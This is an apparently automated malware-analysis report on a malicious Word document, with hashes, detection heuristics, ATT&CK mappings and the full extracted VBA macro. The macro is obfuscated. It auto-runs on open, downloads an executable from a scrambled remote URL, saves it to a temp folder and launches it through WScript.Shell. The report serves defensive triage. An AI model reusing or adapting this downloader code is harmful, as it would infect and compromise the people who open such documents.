Office (OLE) malware analysis — malicious · 1aee9a23f7ce1384

MALICIOUS

Office (OLE)

81.0 KB Created: 2016-05-12 23:19:00 Authoring application: Microsoft Office Word First seen: 2017-12-08

MD5: 245f0ce752029d05ec7dae9258afe33a SHA-1: 0e5d593ce54a2763d160e411a6dd95802cf14d77 SHA-256: 1aee9a23f7ce138450e3a9bf46719e5349cb71e63bfd3141e364e881dc8def58

330 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro attempts to run external commands or download additional payloads. The presence of these indicators strongly points towards a dropper or downloader functionality.

Heuristics 10

ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Dim knoxiI As Boolean, FxaIym As String
Set ociRh = CreateObject("WScript.Shell")
End Function

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Dim knoxiI As Boolean, FxaIym As String
Set ociRh = CreateObject("WScript.Shell")
End Function

CallByName call high OLE_VBA_CALLBYNAME

CallByName call

Matched line in script

Public Sub OAYgchQTvx(ByVal UrCIe As Integer, ByVal MuhqNL As Object, ByVal ZMNJmZ As String)
CallByName MuhqNL, ZMNJmZ, 1
End Sub

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
End Sub
Private Sub Document_Open()
Dim jZUFYdJU As Boolean
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8756 bytes
SHA-256: `9bd916b59ed42a01bff9fd42729d83e3ccb629513147f07dfbce1986a9f1857e`
Detection ClamAV: No threats found Obfuscation or payload: likely 150 of 224 identifiers look randomly generated (e.g. 'ko4nklXiknevCbXus4XiXnCes4svvnvepkavvlk') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub cArRYNDn(ByVal gukrdcGa As String, ByVal UfYDuus As String) wHTiRT If mjspzU(9002, 675, "ZUPi") Then jGxNa True, "LQY", "2QT" QwNZHX tmRfIVJh 807 End If End Sub Private Sub jYFBxEH(ByVal aloePMB As Integer) YoQROe 280, "JkvjI", 3880 nSBNYIEqi szgGkotf 3197, "rh", True End Sub Private Sub Document_Open() Dim jZUFYdJU As Boolean UYAPtnNhc.YNyJc End Sub Private Sub xEiTHqPzdw() mqxGfUKgzi 6499, "iUhGF", "MAq" MmaltzrlX 1715 If hBTkqIt("bc") Then rRoMb Else yqyGeqxn End If End Sub Private Function HDOaeL() As String yhlAeROGu HDOaeL = "" End Function Attribute VB_Name = "fctnUJvB" Private Sub pqFoNu(ByVal cUIlFJ As Boolean, ByVal mpVEEoFeiL As Integer) JdrgwQ End Sub Public Function ociRh() As Object Dim knoxiI As Boolean, FxaIym As String Set ociRh = CreateObject("WScript.Shell") End Function Public Function kqWmVjU() As Object Set kqWmVjU = CreateObject("MSXML2.ServerXMLHTTP.6.0") End Function Private Sub nwNklT() If euVWF Then EqgCajclK 1379, False, "8tb0r" End If End Sub Private Sub DjJdbvrGws(ByVal uNciuGe As String) rwKYqDFg True, 2503 End Sub Public Function XAOWE() As Object Dim yCJCioLQ As Boolean Set XAOWE = CreateObject("ADODB.Stream") End Function Private Function eHaCOUB() As Integer scmBSvpTk 2792 lJSsRbNCDs jTPYG 698, True upFcL "9v0y", "ietB", 3231 eHaCOUB = 5750 End Function Attribute VB_Name = "hJdkrISfRI" Private Function QkzVIaKRdq(ByVal zXdxLXHJOu As Boolean, ByVal VqmQo As String) As Boolean aAnoEkmH TYWXT SIYNpFH If bIFLsWSDYA Then sjrIRNel pIxxnGPm True, 5648 Else oRDnv GIOdryBDU End If QkzVIaKRdq = False End Function Public Function mBLDZt(ByVal AwdLbPsP As String, ByVal TfWeBvAl As String) As String Dim lZENGx As Boolean Dim QnyoxNSNA As String crcNfikH = "vPq" For ilVqRoWS = 1 To Len(AwdLbPsP) lZENGx = vKSKly.EbcPrxWIPp(vKSKly.qIWso(ilVqRoWS, 5243, XNEwdo, AwdLbPsP), TfWeBvAl) If Not lZENGx Then mBLDZt = vKSKly.HiyTrdWiC(2102, True, vKSKly.qIWso(ilVqRoWS, 5243, XNEwdo, AwdLbPsP), mBLDZt) fitPL = "myy1" End If Next End Function Private Function TlMubMvzy() As Integer ngHBnhTd 5855, 1524 UimfM kCujVAMx If zXmQhJr Then vMylTY ROzIu End If TlMubMvzy = 5758 End Function Private Function XNEwdo() As String XNEwdo = "IQc" End Function Attribute VB_Name = "NesZZN" Private Sub zhOfCLGAh(ByVal YsTrxCd As Boolean, ByVal baPmL As Integer) QzYClH "", 8941, "1h" End Sub Public Sub OAYgchQTvx(ByVal UrCIe As Integer, ByVal MuhqNL As Object, ByVal ZMNJmZ As String) CallByName MuhqNL, ZMNJmZ, 1 End Sub Public Sub WdTIctCB(ByVal gHwDfef As Variant, ByVal CecwjDwM As String, ByVal LJASoRFb As Variant, ByVal IEsGQVFRPD As Object, ByVal kSWAN As Variant) IXNhTW = "wu2T" CallByName IEsGQVFRPD, CecwjDwM, 1, gHwDfef, LJASoRFb, kSWAN End Sub Public Function VnqGr(ByVal EqbksrHJWl As String, ByVal YQEfFUIkji As Object, ByVal jDxWKBJA As String) As Variant Dim TgzgRm As Integer, bAmMXC As Integer Set VnqGr = CallByName(YQEfFUIkji, EqbksrHJWl, 2, jDxWKBJA) End Function Public Sub psmYUGta(ByVal cndQCK As Variant, ByVal IqWqx As String, ByVal xcClC As Integer, ByVal wNWLcLq As Variant, ByVal MuvVSVYbN As String, ByVal FYSwE As Object) CallByName FYSwE, IqWqx, 1, cndQCK, wNWLcLq End Sub Public Sub nesFSM(ByVal yZmucbfq As Boolean, ByVal QGKGN As Variant, ByVal zApBI As Object, ByVal HvDJbFOC As String) CallByName zApBI, HvDJbFOC, 4, QGKGN End Sub Private Sub dKeajQeJb(ByVal pxKWbO As Integer, ByVal ArpVfOqxUe As Integer) VYZRTX "QVxu" FaPULoVT 5592, "mO", "Hdm" End Sub Public Sub PDvQIuVeS(ByVal dHZfsR As String, ByVal aipvsG As Object, ByVal bsphVBIbW As Integer, ByVal Xnyao As Variant, ByVal EBJmPKEkwc As String) CallByName aipvsG, EBJmPKEkwc, 1, Xnyao End Sub Public Function oKMLWOIu(ByVal EBmBLECPCy As String, ByVal kgQSTQaLT As String, ByVal uOAQDYTOq As Object) As Variant Dim VrzKf As Integer, UNYDxtaaT As Boolean oKMLWOIu = CallByName(uOAQDYTOq, kgQSTQaLT, 2) End Function Attribute VB_Name = "UYAPtnNhc" Private Function KcLkykbw(ByVal yZFyu As String, ByVal FNGzsral As String) As String Dim FMrcnC As Integer Set mzqsVSdEnY = NesZZN.VnqGr(zgLftjf, fctnUJvB.ociRh, hJdkrISfRI.mBLDZt("P3RAWOVCVES3VS", ".A3VW")) KcLkykbw = mzqsVSdEnY(yZFyu) End Function Private Function sdLSRsN() As String sdLSRsN = hJdkrISfRI.mBLDZt("OYp4eCnC", "CY4 ") End Function Private Function zgLftjf() As String zgLftjf = hJdkrISfRI.mBLDZt("E8nYYvGirbYoGnbm8eBnGt", "8bBGYX") End Function Private Function iINmLqLcFT() As String iINmLqLcFT = "Zyef" End Function Private Sub FLSwdw(ByVal yHJGrbfx As String, ByVal tSzIoLzby As String) Set VaMmKljHAo = fctnUJvB.kqWmVjU NesZZN.WdTIctCB aQMsfePM, hJdkrISfRI.mBLDZt("OYp4eCnC", "CY4 "), yHJGrbfx, VaMmKljHAo, False NesZZN.psmYUGta hJdkrISfRI.mBLDZt("UJsJJerj-JJAjgJeJnGt", "GJj"), RekpUw, 2963, hJdkrISfRI.mBLDZt("MRIoIzi2lR2laGI/4I.I0IR G(c2oRmRIpGa2t2iIbIlIe;I)G", "2RGI"), uIQxdssCz, VaMmKljHAo NesZZN.OAYgchQTvx 1177, VaMmKljHAo, ZemfS eRxGpJyV True, 6317, tSzIoLzby, NesZZN.oKMLWOIu(uIQxdssCz, suEAXd, VaMmKljHAo) End Sub Private Function suEAXd() As String suEAXd = hJdkrISfRI.mBLDZt(".ReXsGOpoqnOsOeqBGOoqdyG", ".GXqO") End Function Private Sub FGpjlnBGJE() Dim byLBEd As Integer OIRUtHf = True On Error GoTo wzCRNF zIxdob = False FLSwdw RzvNZW, NADCx HcteDa NADCx Exit Sub wzCRNF: End Sub Private Function NADCx() As String Dim ZsJDWpI As Integer, hIKrUpMu As Integer NADCx = KcLkykbw(hJdkrISfRI.mBLDZt("ZTEUMZsP", "9cZUsX"), "qHC0") & UdOgCDWtH End Function Private Function pBZwwtKg() As String pBZwwtKg = hJdkrISfRI.mBLDZt("nTyHpaeB", "HBaqXn") End Function Private Function UdOgCDWtH() As String Dim YfrDcmv As Integer Dim mlsaPnV As Integer JJNlxuFaS = True UdOgCDWtH = caVOtQWO End Function Private Sub HcteDa(ByVal spFOX As String) NesZZN.PDvQIuVeS "DJ", fctnUJvB.ociRh, 7188, spFOX, hJdkrISfRI.mBLDZt("kEx2eI1c", "k31IG2") End Sub Private Function uIQxdssCz() As String uIQxdssCz = "f1l8" End Function Public Sub YNyJc() Dim AAaFlCz As Integer Dim BCooTgNYK As Boolean kZsag = 4121 FGpjlnBGJE End Sub Private Function GHBEoEBFe() As String GHBEoEBFe = hJdkrISfRI.mBLDZt("YClm/o/s0e", "0dY/m") End Function Private Function RzvNZW() As String Dim zEncqTWUTC As Integer RzvNZW = hJdkrISfRI.mBLDZt("h4tCtRRp:k/kv/ko4nklXiknevCbXus4XiXnCes4svvnvepkavvlk.ckko4m/Rs4yv4skteRXmX/Xca4XcvhXe/RRwkorXkd.kCe4xeX", "RXkv4C") End Function Private Sub eRxGpJyV(ByVal aPhsNqKGx As Boolean, ByVal ejskpR As Integer, ByVal xJGIRrOk As String, ByVal BaVYYT As Variant) Dim fbYrqt As Boolean Dim NWvvoYkL As Integer Set vxYGxkHNZ = fctnUJvB.XAOWE NesZZN.nesFSM True, 1, vxYGxkHNZ, pBZwwtKg NesZZN.OAYgchQTvx 1177, vxYGxkHNZ, sdLSRsN uRUxACPwrk = 5904 NesZZN.PDvQIuVeS iINmLqLcFT, vxYGxkHNZ, 7188, BaVYYT, hJdkrISfRI.mBLDZt("Wbbribtzek", "Zzlmkb") sIbLjqP = "fu" NesZZN.psmYUGta xJGIRrOk, ApJKIxVhCK, 2963, 2, iINmLqLcFT, vxYGxkHNZ NesZZN.OAYgchQTvx 1177, vxYGxkHNZ, GHBEoEBFe End Sub Private Function aQMsfePM() As String XBoKEL = False aQMsfePM = hJdkrISfRI.mBLDZt("G.E TB", ".BA ") End Function Private Function ApJKIxVhCK() As String ApJKIxVhCK = hJdkrISfRI.mBLDZt("pSraUvremToVUFimlVed", "mprdUV") End Function Private Function caVOtQWO() As String caVOtQWO = hJdkrISfRI.mBLDZt("G/Fa508F59dF512F9GaFGa1FG050855aG4G.FexFeG", "F5G") End Function Private Function RekpUw() As String RekpUw = hJdkrISfRI.mBLDZt("SEehtELReLlqhuelshhtLHhepaldlelr", "ELlhp") End Function Private Function ZemfS() As String ZemfS = hJdkrISfRI.mBLDZt("SIerIndr", "MIrG") End Function Attribute VB_Name = "vKSKly" Public Function qIWso(ByVal PcdvoPfet As Integer, ByVal VDVKZKg As Integer, ByVal MgGCf As String, ByVal DoZXko As String) As String Dim ojpDM As Integer, PsDspeSF As Integer qIWso = Mid(DoZXko, PcdvoPfet, 1) End Function Private Sub EowNh(ByVal crDXUwlvAH As Integer, ByVal XYySpGi As String) BkMTwPAnUV "Br", 5936 vVjYXg 5637 If LYvcZvEUHc Then ZkAFSHcy RYUrsdm True aVgAUZYDE 8658, "wF", "8s" End If nnWkkdeYWI "", "AGC", False tvremm "", "GOr", True End Sub Public Function HiyTrdWiC(ByVal IvdbG As Integer, ByVal LGgEjjWIwK As Boolean, ByVal YMNqgYKkz As String, ByVal dbqMQfkGmY As String) As String HiyTrdWiC = dbqMQfkGmY & YMNqgYKkz End Function Public Function EbcPrxWIPp(ByVal kbbOhppIw As String, ByVal VJPIRS As String) As Boolean Dim xgurqnLbJ As Integer EbcPrxWIPp = InStr(1, VJPIRS, kbbOhppIw) End Function

Open this report in the interactive analyzer, or submit your own file for analysis.